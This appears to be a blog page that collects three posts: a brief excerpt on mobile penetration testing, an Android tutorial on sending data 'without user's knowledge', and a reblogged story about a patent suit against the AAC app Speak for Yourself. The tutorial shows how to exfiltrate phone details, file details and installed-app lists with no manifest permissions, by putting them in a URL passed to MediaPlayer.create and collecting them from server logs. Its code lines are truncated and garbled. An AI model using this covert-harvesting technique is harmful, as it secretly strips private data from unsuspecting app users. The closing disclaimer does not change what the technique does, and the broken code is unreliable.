That a Phone in Your Pocket or Are You Scanning My Network?



That a Phone in Your Pocket or Are You Scanning My Network?

Monday, January 16, 2012

Malgorzata Skora 


Article by Ken Westin

Mobile Penetration Testing: Is That A Phone In Your Pocket Or Are You Scanning My Network?

When most people think of penetration testing, they think of a simulated external attack where the tester tries to break into a network from a remotely.

Companies focus most of the security spending and policies on keeping hackers from the outside in, from firewalls and other security hardening appliances, software and tools.

However, given the proliferation of mobile devices in the workplace and use of Wi-Fi networks inside of an office, attacking from inside the network provides unique opportunities.

Smartphones have become much more powerful over the past few years, with powerful processors and a plethora of hardware at your fingertips. Combine this power into a compact unit with the right apps you can scan a network from the inside in seconds along with several other new types of attacks and information gathering.

Your browser may not support display of this image. Mobile devices have accelerated productivity as they move to replace many of the other devices we used to carry in a small package. Most phones have Wi-Fi capability, cameras, mass storage capability and a persistent internet connection via 3G and 4G and allow a wide number of applications and if rooted provide many of the same tools as a computer, but with more hardware and network capabilities. Continue reading

548 total views, no views today

Send out http data without permissions on Apps


Finally the magic part ok we got all the information but how do we send it without user’s knowledge and harvest some data.

This trick is very simple to do , first create your strings about the information described above which you want to send than i will show you how to send them .
using this single code of line you will be able to connect to any http page and send your previously created Strings about phone and user details or text files

MediaPlayer.create(this, Uri.parse(“”+PhoneDetails+FileDetails+InstalledAppsDetails));

How Does this will send information
When you call MediaPlayer.create static function ,normally it is expected you to provide an video audio file link for streaming ,well you do not have to , you can just type any url it will still connect and even if the link is not working on the other side of the server you will have the information It will be stored in your Apache Server Logs ,because you have just requested a non existing file on the server with the user details and the other stuff in url.

You can also create a php page and try to post your stuff
php post page probably should work as below(i have tested this one but assuming it might just work)
MediaPlayer.create(this, Uri.parse(“”+userDetails+PhoneDetails+FileDetails+InstalledAppsDetails));

The main trick of this tutorial was that without using any single permission in your AndroidManifest.xml file you will be still able to send data to any server
by just using a single line of code you just request on your website a non existing page and it will be logged on your Apache ServerLogs or if you have a php post file you can just print it on your page or store on your database.

MediaPlayer.create(this, Uri.parse(“;

Please use this wisely and for training purposes only and take it as an example of how actually android security is vulnerable.

320 total views, no views today

Patents Threaten To Silence A Little Girl, Literally



via Patents Threaten To Silence A Little Girl, Literally.


Slashdot points us to a sad story from blogger Dana Nieder, providing yet more evidence of how patent monopolies can hold back innovation and do very real damage to people’s lives in the process—and how people are interested in progress, not patents. As Dana says in her post, she understandably doesn’t give a damn about legal details when something as important as her daughter’s ability to communicate is at stake:

My daughter, Maya, will turn four in May and she can’t speak. The only word that she can consistently say with 100% clarity is “done”—which, while helpful, isn’t really enough to functionally communicate. When Maya was two and a half we introduced her to the iPad, and we’ve danced with AAC (augmentative and alternative communication) ever since. We experimented with a few communication apps, but nothing was a perfect fit. After an extensive search for the perfect app, we found it: Speak for Yourself. Simple and brilliant, we saw that it had the potential to serve Maya into adulthood, but was also simple enough for her to start using immediately.

And she liked it. And it worked. And I started to have little flashes of the future, in which she could rapidly tap out phrases and ideas and tell me more and more of the secret thoughts that fill her head—the ones that I’m hungry to hear and she’s dying to share but her uncooperative mouth just can’t get out.

My kid is learning how to “talk.” It’s breathtaking.

But now Speak for Yourself in under fire, and from a surprising (to an AAC outsider) or not-so-surprising (to an AAC insider) source. They’re being sued by Semantic Compaction Systems and Prentke Romich Company, big names in the AAC world. SCS and PRC allege that Speak for Yourself is infringing on their patents. I’m going to be honest: I don’t know about patents and infringement, and I’m not going to get into debates about the legal merits of the case, because that’s a conversation in which I would quickly drown.

Dana explains that her defense of the app isn’t arbitrary. Before discovering Speak For Yourself, she explored dedicated speech devices from the big AAC companies, including Prentke Romich. None of their options were suited to her daughter, and they all carried hefty price tags—as in $7,000+ hefty. She began asking around to see if PRC or any of the other big companies were planning on releasing an iPad app, and learned that although many customers were clamoring for one, the companies had no intention of meeting their demands. They didn’t want an affordable option out there reducing sales of their expensive systems.

Whenever the incumbents of any industry are ignoring the demands of their customers, you can bet that someone else is paying attention. In this case, it was speech-language pathologists Heidi LoStracco and Renee Collender, the pair behind Speak For Yourself. The app’s website explains how it came about:

Mrs. LoStracco and Mrs. Collender began to see a shift in the field when the iPad was released. Mrs. Collender says, “Districts and parents were buying an iPad with an ‘AAC’ app on it and saying, ‘Make this work.’ We would try to reprogram the applications with the language that the children needed, but it took forever and it was never really ‘right.'” Heidi and Renee say that it got to the point that someone was asking them about iPad applications for AAC every day, and they decided that they needed a better answer. Heidi says, “We would tell them, there’s not really an effective AAC app out there yet, but when there, is, we’ll be the first to tell you about it.” Then we started thinking that we could create something that followed motor learning principles and gave individuals access to the language they needed to communicate effectively, and that’s when we designed Speak for Yourself.” Renee says, “We’ve always believed that communication is a basic human right, and the only AAC pre-requisite skill that a nonverbal person needs is a pulse.”

Dana points out that PRC’s mission statement begins “We Believe Everyone Deserves A Voice” and that their refusal to create an affordable iPad app, and now their attempts to crush a competitor who did, clearly runs counter to that mission. For her, that’s basically where the discussion ends: a company is trying to take away the only thing that has been able to give her daughter a voice, and she couldn’t care less whether or not they have the legal right to do so.

It’s hard not to sympathize with her position, even though the lawsuit and the patent in question, #5,920,303, both appear to be solid. As Dana’s story gains traction, we can only hope that it will increase social pressure on PRC and possibly shame them into allowing Speak For Yourself to survive by offering them an affordable license, or at least releasing their own iPad app at a similar price point—but as we’ve seen with pharmaceutical companies, the holders of life-saving and life-changing patents often don’t seem too bothered about withholding them no matter what it does to their public image.

Ultimately, this is more evidence that in today’s world of rapid innovation, tech monopolies are increasingly untenable. Big companies that have dominated niche markets for years—and have long since paid off their R&D costs by charging monopoly rates—are being disrupted by nimbler competitors. As we’ve seen with media and software piracy, this happens whether or not the competitors are “legitimate” under intellectual property law. Can there be any doubt that, if Speak For Yourself is shut down and the app eliminated, Dana will seek out a way to keep it running on her daughter’s iPad? Since her story is running on Slashdot, she’s already received comments with advice on how to do so, and suggestions that she contact Speak For Yourself and convince them to release their source code on github. At the moment, it looks like she just plans on turning off all connectivity on the iPad so that it will no longer sync and the app will remain even if it is removed from the iTunes store. Can anyone blame her? The simple fact is that markets always eventually find a way to meet demands—and if companies (especially those in industries that seriously affect people’s lives) use their intellectual property to block powerful market forces, that control will eventually be wrested from them, one way or another.

454 total views, no views today